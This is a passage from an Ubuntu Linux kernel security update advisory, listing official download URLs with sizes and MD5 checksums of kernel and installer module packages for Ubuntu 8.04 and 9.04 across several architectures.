http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    82646 498f6209320fef7240940bd2eafe8f91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    82950 f8cd11b646c7b769865e9b0a6e563479
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    48532 fe22024e55539bf9079c05f25651599f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    48460 c070e99c0ec169067c45861ee64e7b00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:     8190 764f83aca8e039670b54ef1bd81bf5c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:     8438 40dd61311a71fb4f258b651d130fedc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    51108 f788272ef04244c5338f2eb833c68c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    52946 6a3a99cd19757aa4a7e5bf9bf0cdcdd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    92156 a595388aea811859919835a4688eeec0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    92430 b1a87544de05790689dedd1408f95825
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1443730 ba618401639337ede996442e8d85c657
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1426998 8d420db6ebadfd73a40ebb281f29b5e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    43244 264bc9d22f2d87c78d9ec1246b475907
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    42806 f16161dac125195d296c774de1c55ec7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    11404 882437fd9335b261cd2ce699edda462e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    12012 20555d5db134914f14f234201b050957
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   471770 7ea7283725e9fc661d40c780fe6e41a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   473736 ab685d960b7ae1f4397f08dca1e3c00f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    70512 f3a95ca8d7726b950d0145ee38a3c90a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    71380 592677ef1ec0f18ae8ac4704e7f6abb2
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_i386.deb
  Size/MD5: 20246854 551dee4824d56cd54ebd6e2ceed36ce4
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_i386.deb
  Size/MD5: 18544608 b047a5db139862e418b7c420e3584e18
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_i386.deb
  Size/MD5: 18785694 ab4b0f6acb874628d207503ab96c72a5

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   334050 cb0a2732f7d57db2d4cf0aff024b0742
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   318522 845ff20c4f352d9accc1809e99f8a1a6
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    62720 da2d0022028e792d039fe638a6e511b2
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    73010 505d3154aa77be5a0e1ad64dfd6ae565
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    41444 0358500eff1aa734aa460223cffbd6fe
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    47828 41d9d6981ea0fb6efb885530e55d229a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    89502 13e293ff0eeef8f0a25532cbc1f6c59e
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   105748 0276e7fc8215525f00c10d0d78729e74
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    44828 a6ad64ce75120444ae7f77eb185f8341
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    40932 b70c6c4ee3bad7a338ef382e8a3cdc13
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   704802 2482fd05dab21510ca1d1cb12255f28d
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   771068 65cf59f3797041350a9066d561c0e064
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   243302 dafec4c170c159b89196ce5a1b3728c1
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   246242 3efe238d1ffb86bb475953cceb77ed8a
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    69164 d97c8f78522a9bdc7b19f9d9eddef075
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   132596 1e4fd78863d1c805c3fbfef2adabc1cf
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    70242 46c97ad3a53ccee9e557521ef833ade4
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    77458 a7d9a6a35e41c3a8e7552471f78f2de6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   146272 074f4acf53ffc60e19b36d4360a6872f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   165012 02994ab52ccb8b88c8a85954c04c214a
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   388012 3d1d5851c82d9b38f7764a2183ec6b72
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   350478 d5c91796ae6b0f20f52cab3328f9b233
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  2431708 6b69540ac9168a1068af1c829e6ad807
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  3474134 efd7274967d4c93a4b4f757b8b663f1b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb
  Size/MD5:   654288 16629f59f727a0d5d1ce1a2f178fdbdc
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb
  Size/MD5:   659270 3acd9fa19531e93a19b79b92946742fe
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb
  Size/MD5:   654194 19fb231dfad96a5202c96e0a963608a6
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb
  Size/MD5: 20175768 245a4d510c48479ca8608d064bb4d0f1
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb
  Size/MD5: 21380060 4c2463eeb9eec0f53a8336ffea5d2f37
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb
  Size/MD5: 19950242 58918c61f50c52423dde5bb0cfea337e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb
  Size/MD5:   699320 f121a6d0897b8a3e3570355ad721475f
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   266748 96cc9a56b70590f6ef9cb4f42abd9f4c
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   307734 2a8ec116cdc2b993d54831e547d3cfe4
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   192248 ae395f02a06c83624393880a1c8bc755
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   201694 0523582031686284be72e9516eb874ed
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   272066 97f5240c866f23e18620876700e08bd5
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   306006 a09ded2fdc08a8b4fd286d5a732de719
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1807806 f968364fcce3f3e06fe0229f9ad00400
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  2119512 8826a9667e0813ad11f13ef49ed0c9ba
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   235184 4d42dbe3fee5610fefc492c84f82f01d
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   225400 72d96411968df5bb24b6c3409111f368
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   170442 65ea470d4661896774e2b17744bde9ea
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   199750 8e539809543d9b39931c2f9c0b608fd3
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   117952 9c0be00ccf310652a819d67e7fecbbbc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   139264 366dd0c02e403ef16c9da1ed940336bb
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    45374 7da2780fd97a9efdb2891c4cd3dbb611
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    46836 f96d04782ea762bb25c5b7fa13927742
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    51136 7eeb8c67107d09cca5d6ec53b4e0e640
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    60300 75caefd9be900faf4d7bd665e0a87e49
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    74182 2b8011cab437a41dc77b94b88e469222
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    87214 134a0a4d60e3a4d00ad71d8a38a00054
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    76092 ad9b456136a6e9bad3004f4e618dbcca
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    30230 83682f80fc1250d73ca5766262c8cf8e
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:     8488 6726b989a4df2541daca42af39d3a30b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    10030 4812e4833e0e4b3ca8e55079cd13d7ff
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    57440 d72f21d71d83cb31c79aa785a6c158a4
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    68744 0276d8aa4abc940cae72d4451ba65cdc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   101186 a3d4b7bea0440fcd1475bc292cece983
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   147822 372e114f4f7becea140fa5f33851d694
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1565814 f4456b5f007c8e045f81e6de0ea25f99
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1514592 726d8053f7f1ddebe305118ee429a5c2
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    76668 a8fe769d492687b7b0e3ae95e1f28038
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    85974 0aa16271f113ef2bb68b07dd5e387800
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    12710 dac27b9a6eed7ad24e351060e8b2858f
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    14558 ec5ed3428e4b13a483d2ff19cff1ccfc
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   450810 4260e241f3f0cb6735739ccea2e70cda
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   505340 18d9294716dcdba902081c38ae39a676
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    83696 1ad62154f4910af7748784cc71c8ec39
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   108846 89b0ef22256773f155bd3d3868dde5cf

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    59576 50a041d5ddbcac27bae81c81a94584e6
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    71726 6be6331d6cec8cdcfb63a25a1d94d0c6
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    42442 750e7a8fbcf37e4f1e18d75952056d6d
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    91778 ae78c7f7ed5677eadcd2bbd04e12e624
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   587170 b8ce9c8d08ad3d2d4527e0ac285a2e85
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   171076 70d9840d79c7d897510c19812c849109
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    22356 684c85bec9286e7c3364cd7e7d20f056
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    46052 ca2fe0707c599d22956dfb3fc8abc724
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   152976 0d22680968c277f76a4001889af0431f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  2135604 1b0f5a9cde179230c1166358c726305b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb
  Size/MD5:   567336 5eec7e6775fe7fea52ca71b52f4de8c3
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb
  Size/MD5:   565774 d5ff9b03b0d4b52aa4b462e9d3b536d9
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb
  Size/MD5: 14098838 83993d0248f289169a7afef405666fbc
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb
  Size/MD5: 13833014 504a7d30fc2f014e930eb66bfa369485
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_sparc.deb
  Size/MD5:   754240 83b808eeb2d8b4061ddf9d268e44171a
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   270056 98f38a0933d936d9aa8112fb6a8e2f79
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   190354 c4600cac5d626ddfa61d83a1ec671247
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   263026 a7df05507a97bf05575bfe742c1f7fa5
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  1386390 54a61a95d39edbcc445094f29c42f262
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   175414 69911cef4dd5a0d3d030a528ce8457b9
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   122098 a0c2adf687a51bbe829adb835ecb71ee
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    40394 3c68e727d9f14a708d9ffc7f1bbe3aff
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    48058 19adf9ec3c25c920295662c53f3dda27
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:     8696 bb826a025cd7b1e9cd679c35c6126648
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    60508 4afc2631d8b1f65d02491233d5ccda2e
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   106836 b422f1235cb15f81230d03e9b3bdb4e1
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  1002042 9b12e59032066f6fe401f01ee248cbda
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:     9518 b89c5ead0ec11c36566524fe1a6f544e
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   391832 a484119637039fe91af1d8bbd8b320aa
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    75926 8ad4b544689a8fee5dc03630477ca40c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz
  Size/MD5:  7408064 bf077530cc28fc2c8ca7f9ebc05eed66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.dsc
  Size/MD5:     3175 c72ff80106672ba9fe2b235ed9a26224
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-19.61_all.deb
  Size/MD5:  3637802 0071d076650095f26837d5a5dedd2145
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19_2.6.28-19.61_all.deb
  Size/MD5:  8702074 9443d9c2687b48b786cb25d72fb485a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb
  Size/MD5: 57052608 2e0d28a7e74ae69fa47a6e6f250948a0

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   234610 23fec831e3f61298baa06636eceedb01
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    44118 4a5fac5654db234e70a2e9eaccbf4285
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    43320 9952d12ff6a86714d06bfcf4bc9e4440
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    51118 7f9136aa3cb5b1041cf0551ddef98511
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    90086 f2df406121a67d4e0a47175ec1d71d9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    38016 d766f9f96987f7493d4fc61e591a8b33
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   521640 fe11a00a5429edfe67d479e8d825a39b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   125832 b4d69c3d7c5c847d8aa24d837db44486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    58072 68d73aff5009f5d5040372f2a46c49e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   312522 221708988c790d5e0fdbc477aaa81323
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  3870958 c7c36beae2f7bf5930443ed3f6fddeb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_amd64.deb
  Size/MD5:   690350 78eff761f3de3ca6b6a5d787b0913386
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_amd64.deb
  Size/MD5:   689874 2f16c0b044e2f930a6de88d26682a404
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_amd64.deb
  Size/MD5: 24343062 cfe2467fe5ca7affab65e8735c698df5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_amd64.deb
  Size/MD5: 24339190 440cbba0ae0f1b19d0a68ee7499ca3ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb
  Size/MD5: 10552344 058b8ed0770e4aa1df480e174f857778
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_amd64.deb
  Size/MD5:   767088 f35f8e695c44c813079736c9c17bd5e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   215202 fcf462d6720a7273ee02c49782e83b13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   189510 9b19fb1abe93c181fe5fda8e72b8cd26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    29406 6288043ea717a7305dc8510cd2f421e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   274494 036b1935bbceccd31a7ed7e41f473f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  1933878 13697cd495d281f48696d983541ffe7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   163480 8de928fc197b8b89ef1c7750a38b0d76
